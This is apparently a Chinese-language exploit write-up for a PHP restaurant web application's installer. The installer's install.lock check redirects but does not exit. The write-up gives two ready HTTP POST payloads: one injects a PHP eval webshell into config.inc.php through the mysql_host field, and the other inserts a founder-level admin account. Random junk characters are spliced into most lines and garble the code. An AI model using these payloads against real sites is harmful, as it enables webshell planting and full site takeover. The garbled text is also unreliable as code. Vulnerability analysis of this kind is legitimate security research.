问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
. j* F8 e" B- g) o4 N2 p+ K* F* j& y5 u6 |% u N
<?php
4 c; D/ D `$ @: i* x$ Tif(file_exists("../install.lock"))4 Y& L( Z6 i8 W: B0 l. i3 Q
{
* ^ g. [( N$ H5 J6 u header("Location: ../");//没有退出 A9 p- H; y+ @
}
4 }: G: ^( j, B2 w9 ^
7 u2 e0 @4 ~" l& \ u3 |//echo 'tst';exit;3 ^0 ]4 ^' H, H" U
require_once("init.php");0 V6 r" z+ N& C1 J/ [ F
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)) x# Z- Z7 v9 o% i
{
/ J2 H8 J7 ]4 ^# C, I0 A" j可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
6 K' A) l) I% D _
" |& b; j) b: i1 T& z2 j& O+ x: D1、getshell(很危险)
1 E- o# `: K1 Qif(empty($_REQUEST['step']) || $_REQUEST['step']==1)4 D: t [( E6 V3 W; `. _" {) S6 L6 S
{
7 V% y6 |1 U, P2 V$smarty->assign("step",1);
" d) h* H, J0 m$smarty->display("index.html");, W% M: o7 E( R2 S3 S/ ?
}elseif($_REQUEST['step']==2)
) @' i _6 U2 G{: [% u. ?$ ?% n" c; A" x
$mysql_host=trim($_POST['mysql_host']);& J3 ^0 ~" @: w
$mysql_user=trim($_POST['mysql_user']);% p. o; c0 p1 I+ g
$mysql_pwd=trim($_POST['mysql_pwd']);
2 z4 `3 _1 Y1 L5 S7 c/ I8 X) w* H9 Y/ } $mysql_db=trim($_POST['mysql_db']);
6 G4 X4 A4 ]9 {3 I( M7 B7 A5 b8 b $tblpre=trim($_POST['tblpre']);( X. d4 G7 H; v: ^
$domain==trim($_POST['domain']);
; D+ {* t& z/ [2 n7 B+ a+ m9 W- d $str="<?php \r\n";
2 [% _2 M$ I- s! ?/ Q" T $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
' h! Q" C; `* V $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
7 t. S. q, j4 d9 a$ e# e, Q $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
: f( w2 C. q; K% G- G $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";: B! s/ l6 q0 i8 p8 D
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
2 u0 O! h8 J/ }+ A# U+ r3 E7 M $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
2 R w$ w) t5 \4 |$ _ v" N) Y: j. V $str.='define("DOMAIN","'.$domain.'");'."\r\n";& w' j7 T0 I# l. z% H. Q' M- z* g# s
$str.='define("SKINS","default");'."\r\n";
7 h* t& }( U0 e4 d$ Y [ $str.='?>';8 v+ P( c: ^! i& K) P
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
% @$ s" b0 ^% M' t) R2 r8 v上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马' f4 G& p A) U6 v, u* u
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
" q! Y# F- B) u& u( A/ b1 y& cHost: 192.168.80.129
/ w' P) f+ M& k# l: B1 ^& NUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.03 Q1 b$ [$ z. l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.81 g9 _" U1 e6 C. Z
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3) F* c8 f" Q% x0 ?$ Q4 h+ U
Accept-Encoding: gzip, deflate
7 M) j. i4 p; |$ ^ vReferer: http://192.168.80.129/canting/install/index.php?step=1$ p) Z( b- p% h! s, B3 h0 V* }
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42; F6 {! g$ H6 Z1 d% `1 L0 x
Content-Type: application/x-www-form-urlencoded, h( T6 e- T6 O! A% O( o
Content-Length: 126
* z+ p) I) ~. c% A % B* x( M* `' x/ R: z
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
# e3 ]6 Z1 ?$ }, d0 A! s但是这个方法很危险,将导致网站无法运行。" {9 K, K! E6 _; f9 B
) M$ W. R( _+ [# k
2、直接添加管理员* V/ d- R! v# I7 i# ?
V' Z. _, w6 y8 n$ R5 w6 g' t7 Y
elseif($_REQUEST['step']==5)
- S V$ `$ ~$ R4 b, \0 m6 \& \{
7 m W. `; v2 F/ B% K, R" i& t( R& U if($_POST)
0 N" ^$ T: c: G { require_once("../config/config.inc.php");
' U h: [, @( f% t $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
! D( d' O+ k! n mysql_select_db(MYSQL_DB,$link);9 L, ?$ y; O4 [3 p2 C! X
mysql_query("SET NAMES ".MYSQL_CHARSET );* o/ q6 W2 p2 I2 Y
mysql_query("SET sql_mode=''");% J$ w& W/ L9 v6 {1 G) Y
7 ^, c6 D5 i9 h( z! ?& i, h $adminname=trim($_POST['adminname']);4 @% F1 I5 {) ?1 W7 p' `
$pwd1=trim($_POST['pwd1']);
e- T5 _, |3 Z- S+ w" ^ $pwd2=trim($_POST['pwd2']);
& h" x# X3 B: D X5 ~9 A5 J2 u if(empty($adminname))
R* Z& s" L3 d1 @ {3 K3 J, K: R8 g; d& [+ v$ {. M
: a6 K& \9 r1 l% d0 y- ]
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
, X% s* D: o! R) r+ ^" n* | exit();
% \. g* p) d) r7 x) A' E }1 i6 ~, h( R+ _- K% k: b
if(($pwd1!=$pwd2) or empty($pwd1))
' k6 C: J; ?$ G0 ~1 u2 ] {1 }4 q n0 ]! k, { l
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出6 F3 n5 p% ]3 C: d! l
}
- e' j5 ?. D/ C% Q) f e. J( s! k mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
% ~" W- X# `7 ?: ^; I' K( k5 g }
/ z( p1 _# n) N) I; C% S6 F这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:, t- v) s/ ]4 ]9 T: b; @
POST /canting/install/index.php?m=index&step=5 HTTP/1.18 x" v- Y7 z2 K
Host: 192.168.80.129, w* b) n! ^# X& [3 D/ Q+ a' l% }/ I
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
2 i# Y& ?6 W' Z1 n# d* tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.89 `; ~. p3 u4 d4 k
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.35 B! b& `( a: L0 a. r
Accept-Encoding: gzip, deflate
% @# }% g5 [8 p+ ?( Y& k( G( sReferer: http://www.2cto.com /canting/install/index.php?step=1/ r- u+ m4 v% v
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
6 k2 i& r$ `2 u5 e4 WContent-Type: application/x-www-form-urlencoded
; L/ S* ?: G+ P) i: G2 lContent-Length: 465 P) Z% i- L2 z( z# w
/ V5 x) l Y* G6 L0 x5 r; b1 r
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
, L" Q6 F# F/ r9 v7 J |